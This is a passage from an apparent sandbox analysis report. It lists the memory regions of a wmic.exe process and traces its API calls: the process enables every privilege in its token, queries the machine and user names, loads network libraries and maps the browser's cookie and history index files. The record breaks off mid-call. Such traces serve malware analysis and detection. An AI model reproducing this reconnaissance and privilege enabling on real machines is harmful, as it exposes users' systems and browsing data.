0x752cafff entry_point = 0x752b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 22077 start_va = 0x75540000 end_va = 0x75589fff entry_point 
= 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22078 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 22079 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 22080 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22081 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 22082 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22083 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 22084 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22085 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22086 
start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 22087 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22088 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 22089 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 22090 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 22091 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22092 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22093 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22094 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22120 start_va = 0x50000 
end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 22121 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 22122 start_va = 0x70000 end_va = 0x7ffff entry_point = 0x70000 region_type = mapped_file name = "wmic.exe.mui" filename = "\\Windows\\System32\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\wmic.exe.mui") Region: id = 22123 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 22124 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 22125 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 22126 start_va = 0x8e0000 end_va = 0x14dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 22156 start_va = 0x150000 end_va = 0x1abfff entry_point = 0x150000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 22157 start_va = 0x150000 end_va = 0x1abfff entry_point = 0x150000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 22158 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 22159 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 22160 start_va = 0x7ffde000 end_va = 
0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 22161 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 22162 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 22163 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 22164 start_va = 0x6ebe0000 end_va = 0x6ebe9fff entry_point = 0x6ebe0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 22165 start_va = 0x6f7c0000 end_va = 0x6f81bfff entry_point = 0x6f7c0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 22166 start_va = 0x590000 end_va = 0x75ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 22167 start_va = 0x14e0000 end_va = 0x17aefff entry_point = 0x14e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 22217 start_va = 0x6c000000 end_va = 0x6c132fff entry_point = 0x6c000000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 22351 start_va = 0x590000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 22352 start_va = 0x720000 end_va = 0x75ffff entry_point = 0x0 region_type = 
private name = "private_0x0000000000720000" filename = "" Region: id = 22353 start_va = 0x3c0000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 22354 start_va = 0x17b0000 end_va = 0x193ffff entry_point = 0x0 region_type = private name = "private_0x00000000017b0000" filename = "" Region: id = 22355 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 22356 start_va = 0x17b0000 end_va = 0x18dffff entry_point = 0x0 region_type = private name = "private_0x00000000017b0000" filename = "" Region: id = 22357 start_va = 0x1900000 end_va = 0x193ffff entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 22358 start_va = 0x1940000 end_va = 0x1aeffff entry_point = 0x0 region_type = private name = "private_0x0000000001940000" filename = "" Region: id = 22359 start_va = 0x1af0000 end_va = 0x1caffff entry_point = 0x0 region_type = private name = "private_0x0000000001af0000" filename = "" Region: id = 22370 start_va = 0x590000 end_va = 0x64ffff entry_point = 0x590000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 22371 start_va = 0x670000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 22372 start_va = 0x1cb0000 end_va = 0x20affff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 22498 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x3c0000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 22499 start_va = 0x410000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000410000" filename = "" Region: id = 22628 start_va = 0x3d0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 22634 start_va = 0x76e70000 end_va = 0x76fa5fff entry_point = 0x76e70000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 22640 start_va = 0x76650000 end_va = 0x76744fff entry_point = 0x76650000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 22641 start_va = 0x76fb0000 end_va = 0x771aafff entry_point = 0x76fb0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 22642 start_va = 0x75420000 end_va = 0x7553cfff entry_point = 0x75420000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 22653 start_va = 0x753f0000 end_va = 0x753fbfff entry_point = 0x753f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 22654 start_va = 0x760000 end_va = 0x85ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 22679 start_va = 0x3f0000 end_va = 0x3f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 22680 start_va = 0x74360000 end_va = 0x744fdfff entry_point = 0x74360000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: 
"c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 22681 start_va = 0x400000 end_va = 0x400fff entry_point = 0x400000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 22682 start_va = 0x450000 end_va = 0x451fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 22683 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 22684 start_va = 0x400000 end_va = 0x400fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 22685 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 22686 start_va = 0x6b0000 end_va = 0x6dbfff entry_point = 0x6b0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 22702 start_va = 0x460000 end_va = 0x467fff entry_point = 0x460000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 22703 start_va = 0x650000 end_va = 0x65ffff entry_point = 0x650000 region_type = mapped_file name = "index.dat" filename = 
"\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 22746 start_va = 0x73c00000 end_va = 0x73c20fff entry_point = 0x73c00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 22747 start_va = 0x75730000 end_va = 0x75774fff entry_point = 0x75730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 22748 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 22749 start_va = 0x1940000 end_va = 0x1a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001940000" filename = "" Region: id = 22750 start_va = 0x1ab0000 end_va = 0x1aeffff entry_point = 0x0 region_type = private name = "private_0x0000000001ab0000" filename = "" Region: id = 22751 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 22752 start_va = 0x20b0000 end_va = 0x229ffff entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 22779 start_va = 0x17b0000 end_va = 0x188efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000017b0000" filename = "" Region: id = 22780 start_va = 0x18a0000 end_va = 0x18dffff entry_point = 0x0 region_type = private name = "private_0x00000000018a0000" filename = "" Region: id = 22781 start_va = 0x1af0000 end_va = 0x1b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001af0000" 
filename = "" Region: id = 22782 start_va = 0x1c70000 end_va = 0x1caffff entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 22783 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 22784 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 22785 start_va = 0x6e0000 end_va = 0x71bfff entry_point = 0x6e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 22786 start_va = 0x6e0000 end_va = 0x71bfff entry_point = 0x6e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 22787 start_va = 0x6e0000 end_va = 0x71bfff entry_point = 0x6e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 22788 start_va = 0x6e0000 end_va = 0x71bfff entry_point = 0x6e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 22789 start_va = 0x6e0000 end_va = 0x71bfff entry_point = 0x6e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 22790 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 22791 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = 
"rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 22962 start_va = 0x1950000 end_va = 0x198ffff entry_point = 0x0 region_type = private name = "private_0x0000000001950000" filename = "" Region: id = 22963 start_va = 0x19a0000 end_va = 0x19dffff entry_point = 0x0 region_type = private name = "private_0x00000000019a0000" filename = "" Region: id = 22964 start_va = 0x1a00000 end_va = 0x1a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 22965 start_va = 0x1bf0000 end_va = 0x1c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001bf0000" filename = "" Region: id = 22966 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 22967 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 22968 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 22979 start_va = 0x660000 end_va = 0x660fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 22980 start_va = 0x713b0000 end_va = 0x71452fff entry_point = 0x713b0000 region_type = mapped_file name = "msvcr90.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcr90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcr90.dll") Region: id = 22981 start_va = 0x71f00000 end_va = 0x71f0cfff entry_point = 0x71f00000 region_type = mapped_file name = "msoxmlmf.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE14\\MSOXMLMF.DLL" (normalized: "c:\\program files\\common files\\microsoft 
shared\\office14\\msoxmlmf.dll") Region: id = 22982 start_va = 0x2490000 end_va = 0x249ffff entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 23042 start_va = 0x6ef00000 end_va = 0x6ef0efff entry_point = 0x6ef00000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 23417 start_va = 0x6ec10000 end_va = 0x6eca5fff entry_point = 0x6ec10000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 23418 start_va = 0x6ebf0000 end_va = 0x6ec07fff entry_point = 0x6ebf0000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 23569 start_va = 0x6e0000 end_va = 0x703fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 24782 start_va = 0x6e0000 end_va = 0x6e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Thread: id = 334 os_tid = 0xf7c [0160.222] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcff14 | out: lpSystemTimeAsFileTime=0xcff14*(dwLowDateTime=0x9949eae0, dwHighDateTime=0x1d440a9)) [0160.222] GetCurrentProcessId () returned 0xf38 [0160.222] GetCurrentThreadId () returned 0xf7c [0160.222] GetTickCount () returned 0x30dd5 [0160.222] QueryPerformanceCounter (in: lpPerformanceCount=0xcff0c | out: lpPerformanceCount=0xcff0c*=21701169701) returned 1 [0160.223] GetModuleHandleA (lpModuleName=0x0) returned 0x870000 [0160.223] __set_app_type (_Type=0x1) [0160.223] __p__fmode () returned 0x76b331f4 [0160.223] __p__commode () returned 0x76b331fc [0160.223] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x8adc15) returned 0x0 [0160.224] __wgetmainargs (in: 
_Argc=0x8bc5e8, _Argv=0x8bc5f0, _Env=0x8bc5ec, _DoWildCard=0, _StartInfo=0x8bc5fc | out: _Argc=0x8bc5e8, _Argv=0x8bc5f0, _Env=0x8bc5ec) returned 0 [0160.414] ??0CHString@@QAE@XZ () returned 0x8bc28c [0160.420] ??0CHString@@QAE@XZ () returned 0x8bc594 [0160.420] ?Empty@CHString@@QAEXXZ () returned 0x6f950504 [0160.420] SetConsoleCtrlHandler (HandlerRoutine=0x8a6b6f, Add=1) returned 1 [0160.420] _onexit (_Func=0x8b2f1f) returned 0x8b2f1f [0160.421] _onexit (_Func=0x8b2f2e) returned 0x8b2f2e [0160.421] _onexit (_Func=0x8b2f42) returned 0x8b2f42 [0160.421] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0160.421] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0160.426] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0160.431] CoCreateInstance (in: rclsid=0x876c60*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x876b90*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8bc1b0 | out: ppv=0x8bc1b0*=0x720828) returned 0x0 [0160.741] GetCurrentProcess () returned 0xffffffff [0160.744] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xcfdbc | out: TokenHandle=0xcfdbc*=0xf0) returned 1 [0160.744] GetTokenInformation (in: TokenHandle=0xf0, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcfdb8 | out: TokenInformation=0x0, ReturnLength=0xcfdb8) returned 0 [0160.744] GetTokenInformation (in: TokenHandle=0xf0, TokenInformationClass=0x3, TokenInformation=0x473b30, TokenInformationLength=0x118, ReturnLength=0xcfdb8 | out: TokenInformation=0x473b30, ReturnLength=0xcfdb8) returned 1 
[0160.744] AdjustTokenPrivileges (in: TokenHandle=0xf0, DisableAllPrivileges=0, NewState=0x473b30*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0160.745] CloseHandle (hObject=0xf0) returned 1 [0160.745] GetSystemDirectoryW (in: lpBuffer=0x473c08, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0160.759] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0160.759] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0160.759] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x76910000 [0160.759] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0160.759] 
SetThreadUILanguage (LangId=0x0) returned 0x409 [0160.760] FreeLibrary (hLibModule=0x76910000) returned 1 [0160.760] _vsnwprintf (in: _Buffer=0x473bc0, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0xcfd18 | out: _Buffer="ms_409") returned 6 [0160.760] GetComputerNameW (in: lpBuffer=0x473c08, nSize=0xcfd70 | out: lpBuffer="CRH2YWU7", nSize=0xcfd70) returned 1 [0160.760] lstrlenW (lpString="CRH2YWU7") returned 8 [0160.760] lstrlenW (lpString="CRH2YWU7") returned 8 [0160.760] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0xcfdac | out: lpNameBuffer=0x0, nSize=0xcfdac) returned 0x0 [0160.761] GetLastError () returned 0xea [0160.761] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x473c50, nSize=0xcfdac | out: lpNameBuffer="CRH2YWU7\\EEBsYm5", nSize=0xcfdac) returned 0x1 [0160.761] lstrlenW (lpString="") returned 0 [0160.761] lstrlenW (lpString="CRH2YWU7") returned 8 [0160.761] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CRH2YWU7", cchCount1=8, lpString2="", cchCount2=0) returned 3 [0160.763] lstrlenW (lpString=".") returned 1 [0160.763] lstrlenW (lpString="CRH2YWU7") returned 8 [0160.763] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CRH2YWU7", cchCount1=8, lpString2=".", cchCount2=1) returned 3 [0160.763] lstrlenW (lpString="LOCALHOST") returned 9 [0160.763] lstrlenW (lpString="CRH2YWU7") returned 8 [0160.763] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CRH2YWU7", cchCount1=8, lpString2="LOCALHOST", cchCount2=9) returned 1 [0160.763] lstrlenW (lpString="CRH2YWU7") returned 8 [0160.763] lstrlenW (lpString="CRH2YWU7") returned 8 [0160.763] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CRH2YWU7", cchCount1=8, lpString2="CRH2YWU7", cchCount2=8) returned 2 [0160.763] lstrlenW (lpString="CRH2YWU7") returned 8 [0160.763] lstrlenW (lpString="CRH2YWU7") returned 8 [0160.763] lstrlenW (lpString="CRH2YWU7") returned 8 [0160.763] lstrlenW (lpString="CRH2YWU7") returned 8 [0160.763] SysStringLen 
